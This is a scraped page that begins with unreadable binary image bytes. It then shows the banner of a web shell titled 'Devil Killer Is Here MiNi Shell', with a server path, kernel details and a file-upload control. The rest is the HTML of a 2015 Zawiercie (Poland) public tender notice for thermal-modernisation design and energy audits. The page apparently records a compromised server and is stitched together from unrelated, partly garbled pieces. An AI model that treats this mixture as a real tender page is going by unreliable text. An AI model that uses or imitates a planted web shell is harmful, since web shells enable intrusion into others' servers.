JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151027/156349-N-2015.html

<p class="kh_header"><b>Zawiercie: Wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego oraz audytu energetycznego dla 3 zadań.</b><br>
<b>Numer ogłoszenia: 156349 - 2015; data zamieszczenia: 27.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego oraz audytu energetycznego dla 3 zadań..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego oraz audytu energetycznego dla: Zadanie nr 1	      
Wykonanie projektu termomodernizacji trzech budynków przy ul. Aptecznej 2, Aptecznej 4 oraz Aptecznej 6 w Zawierciu w ramach zadania pn.: Termomodernizacja budynków mieszkalnych oraz użyteczności publicznej w Zawierciu.
Zadanie nr 2   
Wykonanie projektu termomodernizacji budynku przy ul. Pastewnej 6 w Zawierciu w ramach zadania pn.: Termomodernizacja budynków mieszkalnych oraz użyteczności publicznej w Zawierciu.
Zadanie nr 3    
Wykonanie projektu termomodernizacji  budynku przy ul. Porębskiej 2 w Zawierciu w ramach zadania pn.: Termomodernizacja budynków mieszkalnych oraz użyteczności publicznej w Zawierciu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.10.00-3, 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, iż dysponuje lub będzie dysponował osobą (-ami) zdolną (-nymi) do wykonania zamówienia tj. posiadającą (-cymi) prawo do wykonywania samodzielnych funkcji technicznych w budownictwie tj. uprawnienia budowlane do projektowania w specjalności (dotyczy zadań nr 1, 2 i 3):
architektonicznej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane upoważniające do projektowania przedmiotu zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane upoważniające do projektowania przedmiotu zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane upoważniające do projektowania przedmiotu zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
W/w osoby powinny posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2013 r., poz. 1409 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 24 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278)
lub odpowiadające im ważne uprawnienia budowlane upoważniające do projektowania    przedmiotu zamówienia, które zostały wydane na podstawie wcześniej  obowiązujących przepisów;
lub
spełniać warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r. poz. 1409 z późniejszymi zmianami) tj. osoba/y której/ych odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (świadczenie usług transgranicznych).
Zamawiający dopuszcza łączenie w/w funkcji.
Wykonawca potwierdza spełnianie warunku poprzez złożenie: 1) oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ), 2) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, oraz informacją o podstawie do dysponowania tymi osobami, potwierdzający spełnianie warunków określonych w SIWZ, który stanowi załącznik nr 2 do SIWZ.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców, albo wszyscy ci Wykonawcy wspólnie - oceniany będzie ich łączny potencjał oraz oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (wskazane przez Wykonawcę w wykazie, o którym mowa w pkt. VI ust. 1 ppkt 2) SIWZ) posiadają wymagane uprawnienia, na potwierdzenie spełniania warunku, o którym mowa w pkt V ust. 1 ppkt 3) SIWZ (zawarte w wykazie, o którym mowa w pkt. VI ust. 1 ppkt 2) SIWZ). 
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców, albo wszyscy ci Wykonawcy wspólnie - oceniany będzie ich łączny potencjał. Zamawiający sprawdzi z treści tych dokumentów i oświadczeń czy Wykonawca spełnia wszystkie ww. warunki. Zamawiający wymaga, żeby Wykonawca wykazał, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa powyżej. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 5 do SIWZ.
2)Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania zamówienia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Z wykonawcą, który złoży najkorzystniejszą ofertę zostanie zawarta umowa, której wzór stanowi załącznik do specyfikacji istotnych warunków zamówienia.
2.	Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku, gdy:
1)	Nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiana stawki podatku VAT.
2)	Przekształcenia podmiotowego Wykonawcy.
3)	Zmiany członków personelu kluczowego Wykonawcy w przypadku wystąpienia nieprzewidzianych okoliczności takich jak: śmierć osoby, rezygnacja / odejście  z pracy lub innych uniemożliwiających należyte wykonywanie obowiązków zgodnie umową lub obowiązującym prawem. W takim jednak przypadku każda nowa osoba musi spełniać warunki określone przez Zamawiającego na etapie wyboru oferty w postępowaniu przetargowym.
4)	Niemożności wykonywania przedmiotu umowy wskutek działań lub zaniechań organów administracji publicznej, których stanowiska są niezbędne do prawidłowego wykonania umowy (np. opóźnienia w uzyskaniu uzgodnień wymaganych przy realizacji przedmiotu umowy, opóźnienia w wydaniu Decyzji administracyjnych dotyczących przedmiotu umowy);
5)	Termin wykonania umowy ulega odpowiednio zmianie o okres trwania okoliczności uniemożliwiających ukończenie przedmiotu umowy w sposób należyty. Zmiana terminu realizacji przedmiotu umowy nie wpływa na zmianę wynagrodzenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2, 42-400 Zawiercie, Wydział Zamówień Publicznych, pokój nr 202..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2015 godzina 12:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2 Punkt Obsługi Interesanta (Informacja), parter UM.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagany termin realizacji zamówienia: Zadanie nr 1 - nie dłużej niż 45 dni od daty zawarcia umowy;
Zadanie nr 2 - nie dłużej niż 45 dni od daty zawarcia umowy;
Zadanie nr 3 - nie dłużej niż 45 dni od daty zawarcia umowy.
Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 27.10.2015r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1	      
Wykonanie projektu termomodernizacji trzech budynków przy ul. Aptecznej 2, Aptecznej 4 oraz Aptecznej 6 w Zawierciu w ramach zadania pn.:Termomodernizacja budynków mieszkalnych oraz użyteczności publicznej w Zawierciu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie: 
1)	audytu energetycznego,
2)	projektu termomodernizacji - obejmuje wykonanie dokumentacji projektowej, przedmiaru robót, kosztorysu inwestorskiego, specyfikacji technicznej wykonania i odbioru robót budowlanych dla termomodernizacji trzech budynków przy ul. Aptecznej 2, Aptecznej 4 oraz Aptecznej 6 w Zawierciu w oparciu o wykonany audyt energetyczny.
Inwestor nie posiada dokumentacji budowlanej budynków.

Opracowana dokumentacja będzie służyła do aplikowania o dofinansowanie w ramach Działania 4.3 Podrozdział 4.3.1 Efektywność energetyczna i odnawialne źródła energii w infrastrukturze publicznej i mieszkaniowej - ZIT.


Przedmiot zamówienia należy wykonać zgodnie z n/w przepisami:
1)rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego      (t. j. Dz. U. z 2013 r.  poz. 1129). 
2)rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym (Dz. U. z 2004 r. nr 130, poz. 1389).
3)rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie ( Dz. U. z 2002 r. nr 75, poz. 690). 
4)Dyrektywą 2012/27/UE w sprawie efektywności energetycznej.

Dokumentacja powinna zawierać:
1.projekt budowlany w 6 egz. w wersji papierowej, 1 egz. w wersji elektronicznej,
2.projekt wykonawczy wszystkich branż w 3 egz. w  wersji papierowej, 1 egz. w wersji elektronicznej,
3.przedmiar robót przez który należy rozumieć opracowanie zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania, wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem liczby jednostek miar i robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych nakładów rzeczowych. Przedmiar musi uwzględniać wymagania określone w  § od 6 do 10 ww. rozporządzenia w 4 egzemplarzach w wersji papierowej  w 4 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
4.kosztorys inwestorski w 2 egz. w wersji papierowej, 1 egz. w wersji elektronicznej
5.specyfikacja techniczna wykonania i odbioru robót budowlanych przez którą należy rozumieć opracowanie zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości  wykonania poszczególnych robót. Specyfikacja musi uwzględniać wymagania określone w § 13 i 14 w/w rozporządzenia w 3 egzemplarzach. w  wersji papierowej, 1 egz. w  wersji elektronicznej.

Stan istniejący:
1.Administratorem budynków zlokalizowanych przy ul. Aptecznej 2, Aptecznej 4 oraz Aptecznej 6 jest Zakład Gospodarki Mieszkaniowej w Zawierciu. Obecnie budynki - mieszkania ogrzewane są piecami węglowymi.
2.Budynki wyposażone są w:
	instalację wodno-kanalizacyjną,
elektryczną.   
3.	Budynek przy ul. Aptecznej 2 składa się z trzech kondygnacji nadziemnych oraz jednej podziemnej. 
Zestawienie powierzchni dla budynku przy ul. Aptecznej 2:
a)	kubatura - 1 740,00 m3;
b)	powierzchnia mieszkań - 270,91 m2;
c)	łączna powierzchnia użytkowa - 270,91 m2;
d)	łączna ilość lokali - 5 szt;
e)	ilość mieszkań -  5 szt.
4.	Budynek przy ul. Aptecznej 4 składa się z dwóch kondygnacji nadziemnych oraz jednej podziemnej. 
Zestawienie powierzchni dla budynku przy ul. Aptecznej 4:
a)	kubatura - 1 437,00 m3;
b)	powierzchnia mieszkań - 294,98 m2;
c)	łączna powierzchnia użytkowa - 409,98 m2;
d)	łączna ilość lokali - 10 szt;
e)	ilość mieszkań -  8 szt.;
f) ilość lokali użytkowych - 2 szt;
g) powierzchnia lokali użytkowych - 115 m2.
5.  Budynek przy ul. Aptecznej 6 składa się z dwóch kondygnacji nadziemnych oraz jednej podziemnej. 
Zestawienie powierzchni dla budynku przy ul. Aptecznej 6: 
a) kubatura - 3 162,44 m3;
b) powierzchnia mieszkań - 414,24 m2;
c) łączna powierzchnia użytkowa - 459,86 m2;
d) łączna ilość lokali - 12 szt;
e) ilość mieszkań -  10 szt;
f) ilość lokali użytkowych - 2 szt;
g) powierzchnia lokali użytkowych - 45,62 m2.
 Budynki przy ul. Aptecznej 2, 4 oraz 6 są w zabudowie szeregowej.

Ponadto do obowiązków Wykonawcy należy: 
1)sprawdzenie w terenie warunków wykonania zamówienia przed przystąpieniem do wykonania prac projektowych,
2)uzyskanie wszelkich uzgodnień, zaświadczeń pozwalających na uzyskanie przez Inwestora  zgłoszenia, 
3)opisywanie proponowanych materiałów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia, wskazaniu temu muszą towarzyszyć wyrazy lub równoważny, wraz z określeniem co należy przez to rozumieć ( wskazanie parametrów technicznych).
4)konsultacja z Zamawiającym istotnych rozwiązań konstrukcyjnych, funkcjonalnych i materiałowych mających wpływ na koszty robót budowlanych, które będą wykonywane na podstawie opracowanego przedmiotu umowy, a także przedłożenie ewentualnych propozycji rozwiązań nie ujętych a istotnych z punktu widzenia Wykonawcy dla prawidłowego wykonania zamówienia, 
5)wsparcie merytoryczne Zamawiającego w trakcie prowadzonego postępowania na wyłonienie wykonawcy robót budowlanych w zakresie zagadnień związanych z  opracowaną dokumentacją projektową
6)w projekcie  na stronie tytułowej oraz na wszystkich rysunkach następnie w przedmiarze, kosztorysie inwestorskim i specyfikacji technicznej datę zapisywać jako dzień, miesiąc, rok,
7)przy podpisach (oprócz rysunków) należy przystemplować imienne pieczęcie projektantów,
8)w przedmiarze i kosztorysie  inwestorskim należy uwzględnić zgodnie z Rozporządzeniem kod i nazwę wspólnego słownika zamówień podstawowych zakresów robót,
9)przedmiary  robót podzielić należy na rozdziały wg. poszczególnych asortymentów robót oraz tabelę elementów scalonych. W przedmiarach oprócz wszystkich asortymentów robót należy również uwzględnić pełną obsługę geodezyjną zadania,
